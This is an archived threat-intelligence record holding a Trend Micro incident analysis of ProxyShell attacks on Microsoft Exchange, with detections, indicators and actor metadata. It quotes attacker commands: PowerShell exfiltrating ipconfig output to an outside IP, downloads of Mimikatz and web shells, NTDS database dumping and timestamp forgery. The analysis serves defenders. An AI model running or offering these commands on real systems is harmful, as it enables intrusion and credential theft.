{ "id": "bfb76688-b772-49b7-9f5f-286699dfc1ad", "created_at": "2026-04-06T00:16:18.181077Z", "updated_at": "2026-04-10T03:33:35.58573Z", "deleted_at": null, "sha1_hash": "f89b51e087d087102343b45978e81e2371519a82", "title": "Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1431801, "plain_text": "Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR\r\nBy By: Abdelrhman Sharshar Nov 17, 2021 Read time: 9 min (2465 words)\r\nPublished: 2021-11-17 · Archived: 2026-04-05 17:13:01 UTC\r\nThe Trend Micro™ Managed XDR team recently observed a surge in server-side compromises — ProxyShell-related\r\nintrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements.\r\nThese compromises, which occurred across different sectors in the Middle East, were most often observed in environments\r\nusing on-premise implementations of Microsoft Exchange.\r\nIn the engagements where the attacker’s objective was realized, we found that the deployment of ransomware was the most\r\ncommon end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to\r\nfavor the use of exploits related to ProxyShell in order to establish initial access to an organization’s system, with the\r\npossibility of ransomware attacks being launched down the line.\r\nUsing intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were\r\ninvolved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share\r\na commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target’s network, were rooted\r\nfrom an IIS Worker Process that was spawning suspicious processes.\r\nThrough our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree\r\ncreated by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes\r\nthat are associated with the different attack phases and how they tied in to the threat actor’s objective.\r\nWe clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different\r\nransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions\r\nwere interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the\r\nchain of events (and whether LockFile, Conti, or any current active ransomware families in the Middle East threat landscape\r\nwill be deployed as part of the routine). \r\nIn this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive\r\ndeeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.\r\nObservations on the ProxyShell Exploitation\r\nThe exploitation of ProxyShell in these attacks involve three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 — the first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of\r\nthese vulnerabilities can lead to arbitrary writing of files that an attacker can leverage to upload web shells on a target\r\nexchange server.\r\nThe malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped\r\nearlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them. \r\nFigure 1. Scanning for web shells\r\nThis vulnerability abuses the URL normalization of Explicit Logon URL, where the login email will be removed from the\r\nURL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange\r\nmachine account (NT AUTHORITY\\SYSTEM).\r\nFigure 2. Exploiting CVE-2021-34473\r\nThe Autodiscover service is abused to leak a known user’s distinguished name (DN), which is an address format used\r\ninternally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the\r\nuser's security identifier (SID).\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 1 of 10\n\nMicrosoft Exchange has a PowerShell remoting feature which can be used to read and send emails. This functionality cannot\r\nbe used by NT AUTHORITY\\SYSTEM as it doesn’t have a mailbox, however, the backend /powershell can be provided via\r\nthe X-Rps-CAT query string parameter in case it is accessed directly using the previous vulnerability, which will be\r\ndeserialized and used to restore the user identity.\r\nThis technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.\r\nFigure 3. An attacker using local administrator account administrator@xxxx along with its SID\r\nThis vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an\r\narbitrary file location, which can be used to write a shell on the Exchange server.\r\nFigure 4. Access to the web shell after being imported\r\nThe web shell is imported as mail inside the administrator[@]xxx draft mailbox. It is then exported to\r\nc:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.\r\nAn analysis of the file system timeline shows the same — the puqjc.aspx file was created at the same time as the malicious\r\nweb connection (2:00 PM UTC)\r\nFigure 5. The system timeline showing the creation of the file puqjc.aspx\r\nPost-exploitation routines\r\nA web shell is a piece of code written in web development programming language (e.g., ASP, JSP) that attackers can drop\r\ninto web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives.\r\nOnce a web shell is successfully inserted into the victim’s server, it can allow remote attackers to perform various tasks, such\r\nas stealing data or dropping other malicious tools.\r\nUpon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors.\r\nThe scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact\r\nvaried.\r\nThe following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that\r\noccurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.\r\nFigure 6. Code showing the exec_code query parameter\r\nIn the first incident we handled, we discovered that the web shell employed in the attack uses exec_code query parameter to\r\nexecute ASP code. After successfully accessing the command-and-control (C\u0026C) server, it executed commands to gather\r\nbasic information on the compromised system.\r\n\"c:\\windows\\system32\\cmd.exe\" /c whoami\r\n\"c:\\windows\\system32\\cmd.exe\" /c ping -n 1 google.com\r\nFurthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware. \r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 2 of 10\n\nFigure 7. Executing PowerShell commands and downloading other malware\r\nThe web shell includes a script that kills security software from specific vendors, and then disables the system’s firewall.\r\nFigure 8. Code showing how the script terminates security software\r\nIt then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then\r\nexecutes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected\r\nmachines.\r\nFigure. 9 Decoded PowerShell command to download and execute Cobalt Strike\r\nFigure 10. Code from the Cobalt Strike obfuscated PowerShell\r\nWe also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the\r\nPowerShell Windows events log.\r\nFigure 11. Script designed to kill PowerShell-related processes\r\nThe IP addresses 212.84.32[.]13 and 103.25.196[.]33, are servers using the Liferay content managing system (CMS). It\r\nseems that these are compromised versions of the software and being used to host the post-exploitation malicious payloads\r\non different ports other than the default ones (80, 443, 8080) used by the CMS. \r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 3 of 10\n\nFigure 12. Properties of the Liferay CMS versions found on the IP addresses 212.84.32[.]13 and\r\n103.25.196[.]33\r\nBoth servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code\r\nexecution).\r\nIncident # 2\r\nSimilar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information\r\non the system. However, the second incident used PowerShell for different post-exploitation activities.\r\nOur analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have\r\ninformation as to what was downloaded since the URL was already dead by the time of analysis.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK\r\nThe following commands were executed in order to gather basic system information:\r\ncmd.exe /c ipconfig\r\ncmd.exe /c dir\r\n\"c:\\windows\\system32\\cmd.exe\" /c ping -n 1 google.com\r\n\"c:\\windows\\system32\\cmd.exe\" /c whoami\r\nThe web shell was then copied and the original entry deleted using the following commands:\r\ncmd.exe /c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx\r\n\"c:\\windows\\system32\\cmd.exe\" /c del \"C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorFF.aspx.req\"\r\nThe ipconfig command was executed as an argument for a wget request.\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 4 of 10\n\nThe following code shows the Powershell-encoded (top) and decoded (bottom) commands:\r\n\"c:\\windows\\system32\\cmd.exe\" /c powershell.exe -exec bypass -enc\r\nJAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0A\r\n$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType\r\n\"application/octet-stream\"\r\nMimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was\r\ndownloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:\r\n\"c:\\windows\\system32\\cmd.exe\" /c powershell -exec bypass -enc\r\nSQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIA\r\nInvoke-WebRequest -Uri \"http://91.92.136.250:443/mimi.exe\" -OutFile \"c:\\windows\\temp\\mimi.exe\"\r\nThe web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system,\r\nseen in the following code:\r\nInvoke-WebRequest -Uri \"http://91.92.136.250:443/out.aspx\" -OutFile \"c:\\windows\\temp\\OutlookCM.aspx\"\r\nThe web shell was then moved to the OWA directory with the following time stamp:\r\n$f1=(Get-Item 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCM.aspx'); $f2=\r\n(Get-Item 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx');\r\n$f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;\r\nAfter a few minutes, additional DLLs were created, which was later verified to be web shell files created either by\r\nw3wp.exe or UMWorkerProcess.exe.\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net\r\nfiles\\owa\\8e05b027\\e164d61b\\app_web_ffhsdhdi.dll\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net\r\nfiles\\owa\\8e05b027\\e164d61b\\app_web_m123qbjp.dll\r\nIn relation to this incident, we found the following malicious components and malware were used:\r\nOutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)\r\nApp_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)\r\nApp_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)\r\nOther web shells\r\nDuring our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which\r\nis quite unusual since most web shells that we find are written in PHP instead.  This is similar to the bespoke web shell the\r\nKRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same\r\nsystem.\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 5 of 10\n\nFigure 13. The web shell written in C#\r\nFigure 14. C# web shell function which executes the Base64 command in CMD\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 6 of 10\n\nFigure 15. Web shell response for known inputs only, otherwise it will respond with error code 404\r\nIncident #3\r\nThe third incident was different from the first two incidents in terms of credential dumping techniques and lateral movement\r\nwithin the system. In this case, the Microsoft Process Dump tool was used to dump LSSAS and extract the hashes.\r\nFigure 16. The execution for procedump.exe during the active attack\r\nThe Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote\r\nmachines and servers in order to drop and execute a new backdoor malware.\r\nA pass-the-hash attack technique was used to access remote servers and machines, after which a new malware component\r\nwas dropped in order to create persistence. \r\nFigure 17. Using a pass-the-hash technique for remote access\r\nThe following malware were dropped on the infected machines:\r\nCacheTask.dll (Backdoor.Win32.COTX.A)\r\ndllhost.exe (PUA.Win64.LanGO.B)\r\nHostDLL.exe (Trojan.Win64.OGNHOST.A)\r\nPersistence was then created on remote machines via scheduled task to keep the backdoor running. \r\nFigure 18. Creating persistence via scheduled task\r\nIncident # 4\r\nWe analyzed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the database\r\nvia the NT Directory Service Utility:\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 7 of 10\n\n\"C:\\Windows\\system32\\cmd[.]exe\" /c ntdsutil \"activate instance ntds\" ifm \"create full c:\\windows\\temp\\ntd\" quit quit\r\nHere is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe\r\nand powershell.exe are used to execute commands on the affected systems.\r\nFigure 19. Trend Micro Vision One ™ console showing the post-exploitation routine using a ProxyShell\r\ninstance\r\nSecurity recommendations\r\nFor the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched,\r\neither knowingly or unknowingly, by their respective IT teams. Microsoft had written in August 2021 that patching to the\r\nlatest cumulative update (CU) or security update (SU) are indeed the first line of defense against threats that exploit\r\nvulnerabilities related to ProxyShell.\r\nWhile mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system\r\n(HIPS/NIPS), can be applied to these servers, it should be noted that these controls would only buy time before any actual\r\npatching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.\r\nIt is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it’s patched after a\r\nsuccessful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should\r\nbe inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be\r\noperational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as\r\nransomware infection, cryptocurrency mining, and data exfiltration.\r\nThe implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behavior\r\n(i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example,\r\nthe observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be\r\na sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers\r\nagainst web shell-based attacks.\r\nTrend Micro Solutions\r\nThe capabilities of the Trend Micro Vision One™products platform made both the detection of this attack and our\r\ninvestigation into it possible. We took into account metrics from the network and endpoints that would indicate potential\r\nattempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in\r\na user’s environment by highlighting important attributes related to the attack.\r\nTrend Micro Managed XDRproducts offers expert threat monitoring, correlation, and analysis from experienced\r\ncybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection,\r\nanalysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth of global threat\r\nintelligence. \r\nTrendMicro Detections\r\nProduct Name Detections\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 8 of 10\n\nEndpoint Security products:\r\nReal Time scan\r\nBehavior monitoring\r\nBackdoor.ASP.CHOPPER.ASPGJI\r\nBackdoor.PHP.WEBSHELL.SBJKWQ\r\nBackdoor.ASP.WEBSHELL.UWMAQF\r\n·Trojan.ASP.WEBSHELL.GIFCM\r\nTrojan.ASP.CVE202127065.E\r\nTrojan.PS1.COBEACON.SMYXAK-A\r\nTROJ_FRS.VSNW1FH21\r\nBackdoor.Win32.COTX.A ()\r\nPUA.Win64.LanGO.B\r\nTrojan.Win64.OGNHOST.A\r\nFileless.AMSI.PSCoBeacon\r\nEndpoint Security:\r\nDeep Security IPS:\r\n1011041 - Microsoft Exchange Server Remote Code Execution\r\nVulnerability (CVE-2021-34473)\r\n1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability\r\n(CVE-2021-34523)\r\n1011072 - Microsoft Exchange Server Security Feature Bypass\r\nVulnerability (CVE-2021-31207)\r\nNetwork Security:\r\nTippingPoint\r\n39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability\r\n(CVE-2021-34473)\r\n39534: HTTP: Microsoft Exchange Server PowerShell Code Execution\r\nVulnerability (CVE-2021-34523)\r\n40057: HTTP: Microsoft Exchange Server Arbitrary File Write\r\nVulnerability (CVE-2021-31207)\r\nNetwork Security: DDI Deep\r\nDiscovery Inspector\r\nCVE-2021-34473 - EXCHANGE SSRF EXPLOIT - HTTP(REQUEST)\r\nCVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)\r\nSHA256 Details Detection Name\r\n428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066 rundll.bat HackTool.BAT.WinDefKiller.C\r\n28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8 CacheTask.dll Backdoor.Win32.COTX.A\r\nE3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2 dllhost.exe PUA.Win64.LanGO.B\r\n27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E HostDLL.exe Trojan.Win64.OGNHOST\r\n5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043\r\nTrojan.PS1.COBEACON.SMYXAK-A\r\n hxxp:[//]103.25[.]196.33:51680[/]check.\r\nhxxp:[//]212.84.32.13:18080[/]get\r\nhxxps:[//]122.10.82.109:8090[/]connect\r\nhxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx\r\n103[.]25[.]196[.]33\r\n212[.]84[.]32[.]13\r\n122[.]10[.]82[.]109\r\n209.14.0[.]234\r\nautodiscover/autodiscover.json\r\n@evil.corp\r\npython-requests\r\n/powershell/?X-Rps-CAT\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 9 of 10\n\nCmd commands (whoami, taskkill, ping, dir, ipconfig)\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nTags\r\nSource: https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html" ], "report_names": [ "analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6c4f98b3-fe14-42d6-beaa-866395455e52", "created_at": "2023-01-06T13:46:39.169554Z", "updated_at": "2026-04-10T02:00:03.23458Z", "deleted_at": null, "main_name": "Evil Corp", "aliases": [ "GOLD DRAKE" ], "source_name": "MISPGALAXY:Evil Corp", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434578, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.pdf", "text": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.txt", "img": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.jpg" } }